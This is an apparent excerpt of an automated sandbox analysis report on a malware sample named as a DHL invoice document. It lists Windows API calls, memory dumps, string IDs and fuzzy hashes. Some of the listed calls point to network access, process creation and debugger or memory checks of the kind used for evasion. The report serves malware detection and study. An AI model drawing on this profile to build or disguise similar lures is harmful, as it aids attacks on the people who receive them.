• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
APIs
• GetDesktopWindow.USER32 ref: 0038D858
• GetDC.USER32(00000000), ref: 0038D862
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
• ReleaseDC.USER32(?), ref: 0038D8A3
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 0038D86C
• GetDC.USER32(00000000), ref: 0038D876
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
• ReleaseDC.USER32(?), ref: 0038D8A3
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
  • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003A4ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0035E30D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
APIs
• CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,?,00000000,00000000), ref: 003B78DD
  • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
• CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,00000000,?,00000000,00000000), ref: 003B783B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: BuffCharUpper$_wcslen
• String ID: <s?
• API String ID: 3544283678-1615119086
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID:
• String ID: #
APIs
• Sleep.KERNEL32(00000000), ref: 0034F2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0034F2BB
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
APIs
• CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003B57E0
• _wcslen.LIBCMT ref: 003B57EC
Strings
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
APIs
• _wcslen.LIBCMT ref: 003AD130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003AD13A
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 003C3621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C365C
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
APIs
  • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
  • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
• GetParent.USER32(?), ref: 003873A3
• DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0038742D
Strings
Similarity
• API ID: LongWindow$ParentProc
• String ID: xV
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C3287
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
APIs
Strings
Similarity
• API ID: CreateMenuPopup
• String ID: xV
APIs
  • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
  • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
  • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
• GetWindowRect.USER32(00000000,?), ref: 003C377A
• GetSysColor.USER32(00000012), ref: 003C3794
Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                                                                                                                        • Instruction ID: fd3f893cb346b5edf44789615b399d28565b99f52191c968c39f8e5ab992ec97
                                                                                                                        • Opcode Fuzzy Hash: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                                                                                                                        • Instruction Fuzzy Hash: E7113AB2610209AFDF02DFA8CC46EEA7BF8FB09314F015518F955E2250D735ED519B50
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C61FC
                                                                                                                        • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 003C6225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3850602802-2513823414
                                                                                                                        • Opcode ID: 63c561d6ee4a47d80c40049d0411c5bc503b49c558fcf229faeff5c40f03f5e3
                                                                                                                        • Instruction ID: 2ff91eb132724eb17d84c16d6c43b7abcd74563050b6ac7480f1a307053b0d03
                                                                                                                        • Opcode Fuzzy Hash: 63c561d6ee4a47d80c40049d0411c5bc503b49c558fcf229faeff5c40f03f5e3
                                                                                                                        • Instruction Fuzzy Hash: B311C171144218BEEB128F68CD1BFBA3BA8EB09311F054519FA16EA1E1D2B1EE10DB50
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003ACD7D
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003ACDA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                                                                                                                        • Instruction ID: cc53262a50907b1ce237b1873a03db62a2566ae9d5006443c45bd8a831f216ef
                                                                                                                        • Opcode Fuzzy Hash: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                                                                                                                        • Instruction Fuzzy Hash: B511C271225635BAD73A4B668C49EF7BEACEF137A4F00522AF11983580D7709840D6F0
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 003C34AB
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C34BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        • Opcode ID: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                                                                                                                        • Instruction ID: d740fc2069bc19ed050203526647bee8a79637d8cfbb0f2e3a9af368e266de48
                                                                                                                        • Opcode Fuzzy Hash: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                                                                                                                        • Instruction Fuzzy Hash: D6118871100208AAEB178E65DC80FAA36AAEB05374F518328F964D71E0C731ED519B60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,?,?,?), ref: 003C4FCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 3850602802-2513823414
                                                                                                                        • Opcode ID: 2c4207c02b14d03800a1f0d3e9125c3c36cdbe0f37d5f25c3262aeb6c3980f67
                                                                                                                        • Instruction ID: a1589c5edaada29c2e5f4355a65f2c4a0e7697c5aa85278656864307d53b0efb
                                                                                                                        • Opcode Fuzzy Hash: 2c4207c02b14d03800a1f0d3e9125c3c36cdbe0f37d5f25c3262aeb6c3980f67
                                                                                                                        • Instruction Fuzzy Hash: 5121D37661011AEFCB16CFA8C950DEABBB9FB4D340B014158F905E7320D631ED61EB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00396CB6
                                                                                                                        • _wcslen.LIBCMT ref: 00396CC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: STOP
                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                        • Opcode ID: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                                                                                                                        • Instruction ID: 2a5fab5ca46b2eebd9bf4bb33ce96071ff2b4ddca5e5d59f8add7efffe7d9d29
                                                                                                                        • Opcode Fuzzy Hash: 4d8f2e3a3c7b28649c0b9b00790c3daf083edf38da97d538c3f3d646593c3bf8
                                                                                                                        • Instruction Fuzzy Hash: D40104326119268ACF239FBDDC829BF37A8EA60710B020534F86296194EB31E800CA50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 0-2513823414
                                                                                                                        • Opcode ID: f2472cb94954077576ecd425a3d58eb1ffff3b9cbb78dcde032f93187900bfb0
                                                                                                                        • Instruction ID: 0e17a6c512b811d1f35fe7e584e2b839ce23c97cd2a4d813180e3b6642327253
                                                                                                                        • Opcode Fuzzy Hash: f2472cb94954077576ecd425a3d58eb1ffff3b9cbb78dcde032f93187900bfb0
                                                                                                                        • Instruction Fuzzy Hash: 22113D75604704AFCB21DF18D850EA5B7E6FB89320F258259F9259B2A0C771F941CF90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00391C46
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                        • Opcode ID: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                                                                                                                        • Instruction ID: 09ee02cf6a8c71d5b6c87e37047de10a89b8335ee6e52722fdecf847240d3207
                                                                                                                        • Opcode Fuzzy Hash: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                                                                                                                        • Instruction Fuzzy Hash: 1D01A775685109A6DF07EB90CA91EFF77AC9F51340F14001AF5167B281EA609E08CAB1
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0034A529
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Init_thread_footer_wcslen
• String ID: ,%@$3y8
• API String ID: 2551934079-1164007899
APIs
  • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
• DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0038769C,?,?,?), ref: 003C9111
  • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 003C90F7
Strings
Similarity
• API ID: LongWindow$MessageProcSend
• String ID: xV
• API String ID: 982171247-2513823414
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403018,0040305C), ref: 003C81BF
• CloseHandle.KERNEL32 ref: 003C81D1
Strings
Similarity
• API ID: CloseCreateHandleProcess
• String ID: \0@
• API String ID: 3712363035-863861157
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: 3, 3, 16, 1
• API String ID: 176396367-3042988571
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00390B23
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
APIs
  • Part of subcall function 0034F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00350D71,?,?,?,0033100A), ref: 0034F7CE
• IsDebuggerPresent.KERNEL32(?,?,?,0033100A), ref: 00350D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0033100A), ref: 00350D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00350D7F
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
APIs
• __Init_thread_footer.LIBCMT ref: 0034E3D5
Strings
Similarity
• API ID: Init_thread_footer
• String ID: 0%@$8%@
• API String ID: 1385522511-2711268310
APIs
Strings
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C233F
  • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                                                                                                                        • Instruction ID: dab4a4ee6de4e8d93c9ff4417ac48dabb561287415caba183f92ebfe205aa43b
                                                                                                                        • Opcode Fuzzy Hash: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                                                                                                                        • Instruction Fuzzy Hash: C6D012367A4310B7E665B771DC0FFD6BA189B40B14F005916F74AEA1D0C9F4B805CB54
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C236C
                                                                                                                        • PostMessageW.USER32(00000000), ref: 003C2373
                                                                                                                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                                                                                                                        • Instruction ID: 97d73e884ce49b4719df8c014e665cdf139924e4f3d311793e8b9aded24cf457
                                                                                                                        • Opcode Fuzzy Hash: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                                                                                                                        • Instruction Fuzzy Hash: 39D0C9327913107AE666B7719C0FFC6A6189B45B14F005916B74AEA1D0C9A4B8058B58